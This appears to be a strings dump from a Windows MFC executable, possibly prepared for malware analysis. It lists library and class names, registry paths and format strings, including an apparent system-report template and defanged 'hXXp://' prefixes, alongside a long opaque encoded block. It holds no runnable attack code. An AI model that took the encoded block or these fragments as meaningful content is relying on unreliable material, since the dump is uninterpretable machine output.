.?AVCHotKeyCtrl@@
.?AVCHotKeyCtrl@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCOleCmdUI@@
.?AVCOleCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCInternetException@@
.PAVCInternetException@@
XiCCA"ttNynnv`XXq/XXB LL8#XXduggo`bbNXllz\llK[nnr)nn2mFFVFuuJVbbJ;ggs#tt8 ttBsddJBXX2Plluroov~tt2{ooe$ddT%vvp?wwR0pp3HjjtSCCvvggVwwwxLVVG;vvNvLLr{bbK=ggH bbw*006-vvGiggW;mm4&XXRhkkx8bbAXmmfYuu1qooN&qqnRjjwAIIMpwwxcxxorQQdqqWGmm1j66sRXXm,ddu`WWcVjj2FoodqVV5iwwcsSSV"jjmPww6kuuJZNNzGwwxyqqd7uuJ|IIu\ppH{ggr}ggJvxxa CCJU33WnxxrfbbJRbbcduu40xxZ.qqC'vvp66d@CCceqqpfww2DjjO*kkeXII3nXXKixxzSwwH>RR4*llwr00C4ppv_33HyxxH HH6eQQ1fXXUmnnHzllc/uuJYlls,QQA(ww4TggHExxf ooxvVVYchhH[RRW%ooJrxxltWWJ]VVH~ccBcxx48nnHsLLZ(ccJEXXd_uuw4VVBBll4;dda'CCK3HH3Jww2(RRocbbK7ee1*ggmVLLC oocMllC6hhJfww3mkkff66vkllG}ggeLvveM66d|hhJ5llcdoo3TVVRYwww-11ARQQHZXXboSSwFqqn-nnx!VVZOjjxggg1NooH/ee5[ppe=SSE)ppwvnniPjje"RRJ\XXZpNNucbbHb55EXmm2&11BxyysnttJDkkfyllrCnnJ/RRv?oos=ddiQhhGMxxN[ttGbMMBSgge'IIl6xxevNN1,xx2^00b9oos xxJ$kke&ggg}bbG#lli|vvK,jj8ZSSwxUU4,hhKHnne4CCf3663*ww4oVVUsnnN*bbVRmm3lVV2{xxv(RRzkxx2RNNppwwf_lliZnnvOoo4hWWKsggs-vvegnn11bbKSNNR@mmN uu3#WWG%ll4hCCw'wwPWwwH566uDQQ41qqwgkkfDggdRWWp,VVh6nn4gSSJ{CCrMnni'ggNnjjGill4lxxPIxxxFFFE|llH455A(llwUggZ3xxA"nnGxmm2q331?xxcfqqnSQQrJXXp^xxe`IIz>uufz33b_XXv:ddH_wwBPnno@SS1=VVUjQQdw666*ggf033i^WWZIjjJ'ooJkllNiXXKZxxHBuuwAxxycSSeWjjykkks*LL2fwwd1qqitpp3ennppwwN:XXRAkkvAwwVJuuK/xx3GWWJ{006Zxx4}SSN|uu4jNNCJvvHww40WWJp00Rellc%SSA`xxc$ttZggwLggH8QQw|ll5XnnemNNwsnnH_RRb xxf|33O*uuf xxh/WW3~LLtzuuNauuN5llA@LLz$ggz6bbEgmmwEggfyhhN]NN2NooKEXXC(CCeI556yXX1oeeH7mmzSVV2#nn3snnt^CCz`lln?SS3{ddl5XXwQjj6!XXd1eeEVmmr,jjUhjj1tddP-uuH6LLWvoozqSS3OnnKQllkxnnJnNNjNnnKjXXr~pppWddeJQQm7LLR#hhNgllm?mmJ#IIK^vvpGtt4NllHANNNVttvfNNPTbbKvqq8)WWZZllLVCCd\ee2Juu3ZbbJokkxCuuARRHPnnvs00BTppJ200phXX3fnny6oo3vbb5;llH!qqt(CCeSnnTppp4{xxUGuuH533iYpp37LLI0jjfOIIO>kkxAuuZ!xxrîE#llevIIg%wwzgxx8_mmH\nn6dbbZ6qqjTccKhjj13SSKEllm|pp1-RRw/xxvPXXR9ttv$gg4hvvf,333wppm(xxY\hhH~00Bpmmfs33adSS2033I0kke>ggW"llejjZAddYCmmzAddxnnnvUggn(SSH ddRcuuZsNNh{mmZtjjvKggvoxx64ooK.NNpnmmf7wwR\WW3juu3!ttv[llzmoov=xxm,bbGJuuHjSS1$ggo4jjvNllR*ggwdVVz%gge%lliFXXNsLLZdxxewllrmxxAheeR{QQefxxTnQQNbxxMNggNlggt$ppHc33GRllm@nnr"ccGHVVA2ppK aaNQww2300sNnnpOuu3(ppA8LLN0nnJTNNyWggf$ww1Cvvf]nn4|CCd$ll1!ttckee5zllcZggr&xxe}IIe`mm1833wUvvG5jjkVccH-LLArxx2xNNM_uuH;RRMiSSB|llf!xxcJnn3\llm)MMH8ppe)FFR/CCHznnxivvxlSSH ppJvRRBSCCKSxxwmooHzEE4&bbJ/00f8nnfooG3nnnoccBNnnGfwwA@ee5GppNQaaECllc#XX4Gkkv*IIeyQQf@llLwwww=HH1Axxs4ttUkttGJxx6\XXvHnnjOSS3/xxz7jj3;llAGll2tVVTgppwKHHB7kkBNgge,uuwnddwnxxckVVEsWWc[ee4QccK}LL3[kkf4xxJMwww-qq8yppZ}ddxJxx3cHH61ooz nnC/nnNrXXJ-oofXxxu}vvcAddu$XX25VVZ.llxSFFH@ppp)uu2eQQ4GggEBllx&665,uupWnnI^mmNMddi#CCr>ddg[lld3qqERmmGGeeZkWWz^jjh"CCJ"jjxgvvf;008Ioo1/xxwipp2hIImpjjcSSS6dnnr/ee6oWWx)VVK_nnmaddEOooeP66CCxx3DLLgEjjN:XX8>ggHmFFAannwHVVTfmme&ooHJggG@ll3~QQHYRRyjvvx4qqd[xxvxeeZjj61SSweVV8-ppZWNNBAQQcwNNYavvvxXXl2bbJqNNiKwwNkkr xxe\nnNoSS6-jjdwllI3mm1@ww5BXXJqjjn7SSG6ooN.CCJmVVc1WWc.jjLAuuG(ddW.wwx|XXV4WWm7LLA%oox6LLuWnnZ(XXrBCCe`ddfBmm1ellIOxxH'VVH2xxsonnOmoovOdd2.nnZ>ddp=ooz=jjW'vvz#ll5`mm4\XXfnnn2zRR1PXXwZgg4uppvmIIM9llH0994OjjvGggaewwN;ee6mooHh66fQxxBTnnlImm2]VVn4bbwfNNCspppfooZFnnJ=ww5.ppz\ll3 ooG%ttP-uuZ]nnLckkeBxxfSmm2-IIm5wwwTLLJeppHfLLJSS1GnnGKxxBlxxxagg4~bb2L66kJbbmjLLxAbb1gllR"uuJmbb6CCCGktt5vbbpGnnC/wwrwVVTKmmwPRRw"ggB LLIwXX1wddPEvvN^ddrwSSmibbVill1rMM6%nn3RXXhIWW37NNr/wwZ|ll8@ww1qLLPihhKsqq4foofEggCsbbGdjj6sWWeyLLv"bbK!tt5hCCcNggwCuu4OllZ jjB)ll4UppdWVVuQQf(gg5HQQr=NN5zpprNNw2ttp6ddm5llZvggl/mmdI66k@kkpoof,ddvuWWz|uuZ0mm1=33i)wwcZVVg7xxr0uuExppKBXXMiQQK]uuPVmmGynnY.nnH3NNxsWWv}nnxEkkv2jjO%uu2'VVpyjjK.VV5BvvJfNNmGXXNsjjn1WW4sjji7SSK3FFVMmm1"66Moxxrejj1ZXX2ggwIee3BpprdjjT&jjK|ddJ WWHP00x-SSe'bb4NbbGiNNhYXX3*llTNxx16NNBojjN%nnvEwwzeHHAUbbH_SSE.llZ ddjHnn1\ll1/vvr'qqd@ttwTIIkBhhJW00eTCCzflldyWW3/llAell2[99E=llGnjjv/jjs-ttU6ttHe55Ncwwp>nnEAjjJjNNvHnnd2NNYTttvhllk=SSJa66q_vvzEddG>ttGJMMB&mm3=MME_ppvK554ejj1jooRdWWK>NN28jjNegga_oo2PSS6ljjB(llT2ggxJFFVYkkc6bbJ"kkeSLLzellGAbbJfbb4~nnM)nn1#ddTBjjw'xxJ&QQZbSS3`SSHkLLHlppNsjj1Zoof#00G~xxJ[llMSppsQeeEcppz;ggRTggr$uuAGggK9jju5jjwC00iySS1[55JwSSfO331$jjeoddKXWWv(jjEzccJwll3NXXA?nni\ppfOXXlBoorbaa5booHC55Z*xxGMHH5SvvrQggJCppGfqqZLooznww3 nn2MIIrEuu1DXXEYSSzSdda\pp4$jjR4CCvgggJcppfT336=ccJ4ggfMmmZMxxrsggeA66E^uuctt8?ttNfqqa"vvwOxxJYWW4TVVy}jjxYXXmxuuHIdds;mm13VVujuuN~VVH*nnf2HHNHSSZInnJ)wwwKggsdmmJJllx(oow(llBPppZyddf2SSJ_jj5=QQdmeeVgnn3>LLY1uur$jjVkxx4cjj6>WWfKxxI"XXd~HHZAnnd$NNRGmmw}UUEPmmG/nnxtXX3%LLZ^nnA,nnVowwfsnnu0vvsexxa]nnJ:NNusllZwNNzmXXeOdd3boow5FFA=WWcBbbJMQQG'ggTOCCf>MMNtWWrkLLTnllKRjjs.vvr!llYaXXK*nnO"SSckll3@QQfN00E[wwJ1HH1{ppeggp~ggf\lld-llP%WW2GnnwBhhGqaa4BnnwAjjO7kkedjjPgppNdqqzemmGzXXxNWWw.qq1XCCH)jjIBwwzRxxZ0wwB#ddoettx5ee3qXXNMLLP6mmKgxxENpp4QNNyyxxARnn2bbc7VVpKnnffddCxppx4XXsiSSB_llx@jjv#66Cxxn4ppfT00YOll1 SS6ammN[aaA;mmeCggWEQQHWnnrunns1dd1ppG?XXI:vvpvttJkuuHTggx0wwvu00zrWWJoXXxnnnfB33efmmwiggVNnnH#00t0wwGtNNn/SSeqdd67wwJ0XXm@ooKeNNCGbb2vnno_nnGBddc{jjNONNPWCCwUMMV XXvzNNdhnnd ddcXppp jjxzxxctnnAtpp2oLLuEE5FQQv~nnKCwwH_qqqkSSHo33LawwJCLL8(ggB.lluKWWZtXXv'ggfS00h]vvvs66v_bbJ}RRH8CCJCxxt`wwK\eeV@bbw_xxTGggr;VVZ}mmfsMMVWpp38xxwAQQz[llrASS11eeN#WWmYnnC?jjcYjjUjttB{EEBQQQJYddI?nnmltt8DttJpXXIPSS2BllD3SSJ^xxDhuuzUaa33uuz9eeEkuuz[SS4QttBVEEB|SSrvggTZnnJlNNUHcc4[jjNiSSKrnnN)SSB]tt8`ttK-qqAQQQ2]bbYZCCva003kbbvWW4WXX3mWWc:xxt^uuz*ggEBnncJuuEaggx@ee4^ccHmbb1*CCG-ggy0mmpTqqP5XXH>FF2,SSe]IIvdwwwoNNV'nn2Addw3XXvKIIP:uud.MMH)xxs%LLOxuu1fXXy?CCvnLL3ijjJE66Rmww3MXX6tnnex66u\xx1z66ynvvJ]66HJjj4lXXrCggv9LLo$llv?jjZsoopPlls,ggK*xxR{kkvT66zzWWB;xxgCbbHHtt1kQQK.nnbyWWwmddj$oof.oo4hXXx[llI nnNjjj3bppAVnnb[nn1]11Z#jjeGXXzTbb4innhpjjfLNNNooAkggvPLLL6jjJ?RRPSjjJ*xxKLCCz#VVLQSSHpddaZQQx*LL8mCCwfRRCRttp:llksxxGiaa1(SSx?ggjWnnZ>XXa9CCKbXX3,llK.LLwtxxw VVNQXX4nLLY/nnpTqqIXggKRqqxUxxrBxxG!uuw\RRJoww1833YKggJAggIYvvfRggunmmv900p:wwewNNG_nnx7nnuUjj4kggGWWWvkddL7SS4LXXA-ppmyxxL*WWr=HH2WooHJllOLmm1|MMP\xxN?jjO-nn4 nnE3XXeR335XXrjXXVFSSJ4xxS/ccdzll3HXXfE00A;WWv\ddU/SSA"ttUVttK}ggN{nn3R00ZbXXcHqqH cc2MIIN/CCmjtt8httKRxxEmnnf9dd1(nnc/ll3DXXf?00AJWWviddUunncXjjMCSSs.ttUsttK llAgbbv^jjN>cc2bRRT`nn3h00Ztnnc6gg2ZnncZttB9kkBAggUTQQ2'SSYtWWf#33IdQQv4NNU WWv%IINoXXfsVVVWXXs266GtQQ2;11Bxyys`gg13SSJ@ddG9nnx 003%SSJXRRDVnnJn00AQQQv*dd1EttG1MMB WWr1ll1&SSzlLLSByy39EETSggc)jjSyyy2XjjK*WWm:33BRWWv~66SLyy4{llA bbv>jjN5yyJ/jjK/WWp^00LHcc2LRRT}nnZr11NBCCsFnn5Jcc4&jjN!SSK4nnL*bb2{xx2`nncLtt0yggc;uuJ=CCdt00ZznncOgg2WWWvejjNlWWv0oo0wggcYuuJnn2UxxYMiimkxxZ ttBWEEB;XXJDxxA-SS2)NNT9QQBvtt8vttJ`XXI
XiCCA"ttNynnv`XXq/XXB LL8#XXduggo`bbNXllz\llK[nnr)nn2mFFVFuuJVbbJ;ggs#tt8 ttBsddJBXX2Plluroov~tt2{ooe$ddT%vvp?wwR0pp3HjjtSCCvvggVwwwxLVVG;vvNvLLr{bbK=ggH bbw*006-vvGiggW;mm4&XXRhkkx8bbAXmmfYuu1qooN&qqnRjjwAIIMpwwxcxxorQQdqqWGmm1j66sRXXm,ddu`WWcVjj2FoodqVV5iwwcsSSV"jjmPww6kuuJZNNzGwwxyqqd7uuJ|IIu\ppH{ggr}ggJvxxa CCJU33WnxxrfbbJRbbcduu40xxZ.qqC'vvp66d@CCceqqpfww2DjjO*kkeXII3nXXKixxzSwwH>RR4*llwr00C4ppv_33HyxxH HH6eQQ1fXXUmnnHzllc/uuJYlls,QQA(ww4TggHExxf ooxvVVYchhH[RRW%ooJrxxltWWJ]VVH~ccBcxx48nnHsLLZ(ccJEXXd_uuw4VVBBll4;dda'CCK3HH3Jww2(RRocbbK7ee1*ggmVLLC oocMllC6hhJfww3mkkff66vkllG}ggeLvveM66d|hhJ5llcdoo3TVVRYwww-11ARQQHZXXboSSwFqqn-nnx!VVZOjjxggg1NooH/ee5[ppe=SSE)ppwvnniPjje"RRJ\XXZpNNucbbHb55EXmm2&11BxyysnttJDkkfyllrCnnJ/RRv?oos=ddiQhhGMxxN[ttGbMMBSgge'IIl6xxevNN1,xx2^00b9oos xxJ$kke&ggg}bbG#lli|vvK,jj8ZSSwxUU4,hhKHnne4CCf3663*ww4oVVUsnnN*bbVRmm3lVV2{xxv(RRzkxx2RNNppwwf_lliZnnvOoo4hWWKsggs-vvegnn11bbKSNNR@mmN uu3#WWG%ll4hCCw'wwPWwwH566uDQQ41qqwgkkfDggdRWWp,VVh6nn4gSSJ{CCrMnni'ggNnjjGill4lxxPIxxxFFFE|llH455A(llwUggZ3xxA"nnGxmm2q331?xxcfqqnSQQrJXXp^xxe`IIz>uufz33b_XXv:ddH_wwBPnno@SS1=VVUjQQdw666*ggf033i^WWZIjjJ'ooJkllNiXXKZxxHBuuwAxxycSSeWjjykkks*LL2fwwd1qqitpp3ennppwwN:XXRAkkvAwwVJuuK/xx3GWWJ{006Zxx4}SSN|uu4jNNCJvvHww40WWJp00Rellc%SSA`xxc$ttZggwLggH8QQw|ll5XnnemNNwsnnH_RRb xxf|33O*uuf xxh/WW3~LLtzuuNauuN5llA@LLz$ggz6bbEgmmwEggfyhhN]NN2NooKEXXC(CCeI556yXX1oeeH7mmzSVV2#nn3snnt^CCz`lln?SS3{ddl5XXwQjj6!XXd1eeEVmmr,jjUhjj1tddP-uuH6LLWvoozqSS3OnnKQllkxnnJnNNjNnnKjXXr~pppWddeJQQm7LLR#hhNgllm?mmJ#IIK^vvpGtt4NllHANNNVttvfNNPTbbKvqq8)WWZZllLVCCd\ee2Juu3ZbbJokkxCuuARRHPnnvs00BTppJ200phXX3fnny6oo3vbb5;llH!qqt(CCeSnnTppp4{xxUGuuH533iYpp37LLI0jjfOIIO>kkxAuuZ!xxrîE#llevIIg%wwzgxx8_mmH\nn6dbbZ6qqjTccKhjj13SSKEllm|pp1-RRw/xxvPXXR9ttv$gg4hvvf,333wppm(xxY\hhH~00Bpmmfs33adSS2033I0kke>ggW"llejjZAddYCmmzAddxnnnvUggn(SSH ddRcuuZsNNh{mmZtjjvKggvoxx64ooK.NNpnmmf7wwR\WW3juu3!ttv[llzmoov=xxm,bbGJuuHjSS1$ggo4jjvNllR*ggwdVVz%gge%lliFXXNsLLZdxxewllrmxxAheeR{QQefxxTnQQNbxxMNggNlggt$ppHc33GRllm@nnr"ccGHVVA2ppK aaNQww2300sNnnpOuu3(ppA8LLN0nnJTNNyWggf$ww1Cvvf]nn4|CCd$ll1!ttckee5zllcZggr&xxe}IIe`mm1833wUvvG5jjkVccH-LLArxx2xNNM_uuH;RRMiSSB|llf!xxcJnn3\llm)MMH8ppe)FFR/CCHznnxivvxlSSH ppJvRRBSCCKSxxwmooHzEE4&bbJ/00f8nnfooG3nnnoccBNnnGfwwA@ee5GppNQaaECllc#XX4Gkkv*IIeyQQf@llLwwww=HH1Axxs4ttUkttGJxx6\XXvHnnjOSS3/xxz7jj3;llAGll2tVVTgppwKHHB7kkBNgge,uuwnddwnxxckVVEsWWc[ee4QccK}LL3[kkf4xxJMwww-qq8yppZ}ddxJxx3cHH61ooz nnC/nnNrXXJ-oofXxxu}vvcAddu$XX25VVZ.llxSFFH@ppp)uu2eQQ4GggEBllx&665,uupWnnI^mmNMddi#CCr>ddg[lld3qqERmmGGeeZkWWz^jjh"CCJ"jjxgvvf;008Ioo1/xxwipp2hIImpjjcSSS6dnnr/ee6oWWx)VVK_nnmaddEOooeP66CCxx3DLLgEjjN:XX8>ggHmFFAannwHVVTfmme&ooHJggG@ll3~QQHYRRyjvvx4qqd[xxvxeeZjj61SSweVV8-ppZWNNBAQQcwNNYavvvxXXl2bbJqNNiKwwNkkr xxe\nnNoSS6-jjdwllI3mm1@ww5BXXJqjjn7SSG6ooN.CCJmVVc1WWc.jjLAuuG(ddW.wwx|XXV4WWm7LLA%oox6LLuWnnZ(XXrBCCe`ddfBmm1ellIOxxH'VVH2xxsonnOmoovOdd2.nnZ>ddp=ooz=jjW'vvz#ll5`mm4\XXfnnn2zRR1PXXwZgg4uppvmIIM9llH0994OjjvGggaewwN;ee6mooHh66fQxxBTnnlImm2]VVn4bbwfNNCspppfooZFnnJ=ww5.ppz\ll3 ooG%ttP-uuZ]nnLckkeBxxfSmm2-IIm5wwwTLLJeppHfLLJSS1GnnGKxxBlxxxagg4~bb2L66kJbbmjLLxAbb1gllR"uuJmbb6CCCGktt5vbbpGnnC/wwrwVVTKmmwPRRw"ggB LLIwXX1wddPEvvN^ddrwSSmibbVill1rMM6%nn3RXXhIWW37NNr/wwZ|ll8@ww1qLLPihhKsqq4foofEggCsbbGdjj6sWWeyLLv"bbK!tt5hCCcNggwCuu4OllZ jjB)ll4UppdWVVuQQf(gg5HQQr=NN5zpprNNw2ttp6ddm5llZvggl/mmdI66k@kkpoof,ddvuWWz|uuZ0mm1=33i)wwcZVVg7xxr0uuExppKBXXMiQQK]uuPVmmGynnY.nnH3NNxsWWv}nnxEkkv2jjO%uu2'VVpyjjK.VV5BvvJfNNmGXXNsjjn1WW4sjji7SSK3FFVMmm1"66Moxxrejj1ZXX2ggwIee3BpprdjjT&jjK|ddJ WWHP00x-SSe'bb4NbbGiNNhYXX3*llTNxx16NNBojjN%nnvEwwzeHHAUbbH_SSE.llZ ddjHnn1\ll1/vvr'qqd@ttwTIIkBhhJW00eTCCzflldyWW3/llAell2[99E=llGnjjv/jjs-ttU6ttHe55Ncwwp>nnEAjjJjNNvHnnd2NNYTttvhllk=SSJa66q_vvzEddG>ttGJMMB&mm3=MME_ppvK554ejj1jooRdWWK>NN28jjNegga_oo2PSS6ljjB(llT2ggxJFFVYkkc6bbJ"kkeSLLzellGAbbJfbb4~nnM)nn1#ddTBjjw'xxJ&QQZbSS3`SSHkLLHlppNsjj1Zoof#00G~xxJ[llMSppsQeeEcppz;ggRTggr$uuAGggK9jju5jjwC00iySS1[55JwSSfO331$jjeoddKXWWv(jjEzccJwll3NXXA?nni\ppfOXXlBoorbaa5booHC55Z*xxGMHH5SvvrQggJCppGfqqZLooznww3 nn2MIIrEuu1DXXEYSSzSdda\pp4$jjR4CCvgggJcppfT336=ccJ4ggfMmmZMxxrsggeA66E^uuctt8?ttNfqqa"vvwOxxJYWW4TVVy}jjxYXXmxuuHIdds;mm13VVujuuN~VVH*nnf2HHNHSSZInnJ)wwwKggsdmmJJllx(oow(llBPppZyddf2SSJ_jj5=QQdmeeVgnn3>LLY1uur$jjVkxx4cjj6>WWfKxxI"XXd~HHZAnnd$NNRGmmw}UUEPmmG/nnxtXX3%LLZ^nnA,nnVowwfsnnu0vvsexxa]nnJ:NNusllZwNNzmXXeOdd3boow5FFA=WWcBbbJMQQG'ggTOCCf>MMNtWWrkLLTnllKRjjs.vvr!llYaXXK*nnO"SSckll3@QQfN00E[wwJ1HH1{ppeggp~ggf\lld-llP%WW2GnnwBhhGqaa4BnnwAjjO7kkedjjPgppNdqqzemmGzXXxNWWw.qq1XCCH)jjIBwwzRxxZ0wwB#ddoettx5ee3qXXNMLLP6mmKgxxENpp4QNNyyxxARnn2bbc7VVpKnnffddCxppx4XXsiSSB_llx@jjv#66Cxxn4ppfT00YOll1 SS6ammN[aaA;mmeCggWEQQHWnnrunns1dd1ppG?XXI:vvpvttJkuuHTggx0wwvu00zrWWJoXXxnnnfB33efmmwiggVNnnH#00t0wwGtNNn/SSeqdd67wwJ0XXm@ooKeNNCGbb2vnno_nnGBddc{jjNONNPWCCwUMMV XXvzNNdhnnd ddcXppp jjxzxxctnnAtpp2oLLuEE5FQQv~nnKCwwH_qqqkSSHo33LawwJCLL8(ggB.lluKWWZtXXv'ggfS00h]vvvs66v_bbJ}RRH8CCJCxxt`wwK\eeV@bbw_xxTGggr;VVZ}mmfsMMVWpp38xxwAQQz[llrASS11eeN#WWmYnnC?jjcYjjUjttB{EEBQQQJYddI?nnmltt8DttJpXXIPSS2BllD3SSJ^xxDhuuzUaa33uuz9eeEkuuz[SS4QttBVEEB|SSrvggTZnnJlNNUHcc4[jjNiSSKrnnN)SSB]tt8`ttK-qqAQQQ2]bbYZCCva003kbbvWW4WXX3mWWc:xxt^uuz*ggEBnncJuuEaggx@ee4^ccHmbb1*CCG-ggy0mmpTqqP5XXH>FF2,SSe]IIvdwwwoNNV'nn2Addw3XXvKIIP:uud.MMH)xxs%LLOxuu1fXXy?CCvnLL3ijjJE66Rmww3MXX6tnnex66u\xx1z66ynvvJ]66HJjj4lXXrCggv9LLo$llv?jjZsoopPlls,ggK*xxR{kkvT66zzWWB;xxgCbbHHtt1kQQK.nnbyWWwmddj$oof.oo4hXXx[llI nnNjjj3bppAVnnb[nn1]11Z#jjeGXXzTbb4innhpjjfLNNNooAkggvPLLL6jjJ?RRPSjjJ*xxKLCCz#VVLQSSHpddaZQQx*LL8mCCwfRRCRttp:llksxxGiaa1(SSx?ggjWnnZ>XXa9CCKbXX3,llK.LLwtxxw VVNQXX4nLLY/nnpTqqIXggKRqqxUxxrBxxG!uuw\RRJoww1833YKggJAggIYvvfRggunmmv900p:wwewNNG_nnx7nnuUjj4kggGWWWvkddL7SS4LXXA-ppmyxxL*WWr=HH2WooHJllOLmm1|MMP\xxN?jjO-nn4 nnE3XXeR335XXrjXXVFSSJ4xxS/ccdzll3HXXfE00A;WWv\ddU/SSA"ttUVttK}ggN{nn3R00ZbXXcHqqH cc2MIIN/CCmjtt8httKRxxEmnnf9dd1(nnc/ll3DXXf?00AJWWviddUunncXjjMCSSs.ttUsttK llAgbbv^jjN>cc2bRRT`nn3h00Ztnnc6gg2ZnncZttB9kkBAggUTQQ2'SSYtWWf#33IdQQv4NNU WWv%IINoXXfsVVVWXXs266GtQQ2;11Bxyys`gg13SSJ@ddG9nnx 003%SSJXRRDVnnJn00AQQQv*dd1EttG1MMB WWr1ll1&SSzlLLSByy39EETSggc)jjSyyy2XjjK*WWm:33BRWWv~66SLyy4{llA bbv>jjN5yyJ/jjK/WWp^00LHcc2LRRT}nnZr11NBCCsFnn5Jcc4&jjN!SSK4nnL*bb2{xx2`nncLtt0yggc;uuJ=CCdt00ZznncOgg2WWWvejjNlWWv0oo0wggcYuuJnn2UxxYMiimkxxZ ttBWEEB;XXJDxxA-SS2)NNT9QQBvtt8vttJ`XXI
truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
5(5,50545
5(5,50545
;
;
5%5U5Z5
5%5U5Z5
9$9*90969
9$9*90969
4 4$4(4,40444
4 4$4(4,40444
0#14112:2
0#14112:2
8Â8J8g8
8Â8J8g8
1
3%3.3=3[3
5U5d5}5
1/2
9#:4:";0;
4 585=5_5
;-;6;?;_;
>->5>@>{>
2$2*202626*747:7@7~72/2u2{23$4-464^43%4X4g4p49 9$9(9,94 4$4(4,40444^6>$>,>2>8>\>7"7*727:7`72-2Z2}2: :$:(:,:7 7$7(7,70747873 3$3(3,303434 4$4(4,40444845 5$5(5,5054585= =$=(=,=0=4=8=8 8$8(8,8084888? ?$?(?,?0?4?> ?(?,?0?4?8?@?\?.----/01/01/01{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|File%dSoftware\Microsoft\Windows\CurrentVersion\Policies\ExplorerSoftware\Microsoft\Windows\CurrentVersion\Policies\NetworkSoftware\Microsoft\Windows\CurrentVersion\Policies\Comdlg32KERNEL32.DLL%s%s.dllE%s (%s:%d)%s (%s:%d)f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
Advapi32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
Ecomctl32.dll
Ecomdlg32.dll
Eshell32.dll
accKeyboardShortcut
wuser32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
{X-X-X-XX-XXXXXX}
PTF://
hXXp://
@WININET.DLL
HTTP/1.0
mfcm100u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
OLEAUT32.DLL
%sCLSID\%s
%d.%d
TYPELIB\%s
CLSID\%s
CLSID\%s\%s
SHELL32.DLL
lXXxXXXXXXXX
dwmapi.dll
UxTheme.dll
eShell32.dll
%s:%x:%x:%x:%x
r%s\shell\open\%s
%s\shell\print\%s
%s\shell\printto\%s
%s\DefaultIcon
%s\ShellNew
%s\ShellEx
\{8895b1c6-b41f-4c1c-a562-0d564250836f}
ddeexec
Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f{8895b1c6-b41f-4c1c-a562-0d564250836f}
{E357FCCD-A995-4576-B01F-234630154E96}
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers
%s\ShellEx\%s
COMCTL32.DLL
USER32.DLL
%sMFCToolBar-%d%x
%sMFCToolBar-%d
ShortcutKeys
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
IDB_OFFICE2007_RIBBON_KEYTIP_BACK
KEYTIP
%sKeyboard-%d
KeyboardManager
%sCommandManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
propsys.dll
%2x%2x%2x
xxx
%s(%i)
MFCLink_UrlPrefix
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
&%d %s
%s-%d
%sMDIClientArea-%d
Zf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sMFCRibbonBar-%d%x
%sMFCRibbonBar-%d
%sPane-%d%x
%sPane-%d
windows
ShowCmd
QHex={X,X,X}
1&0 %s
X%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
Yf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
Ymsctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
@%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
[%d, %d, %d
%d, %d
[RICHED32.DLL
RICHED20.DLL
\%s %s
\f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
%s-Bar%d
%s-Summary
MRUDockLeftPos
Bar#%d
RGB(%d, %d, %d)
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
]f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockcont.cpp
^f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelink.cpp
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
Windows XP
Windows Server 2003
Windows Vista
Windows 98
Windows Me
Windows 2000, Windows NT 4.0, or Windows 95
Win32s on Windows 3.1.
OS: %s, SP: %s, STATE:%d, HOME:%s
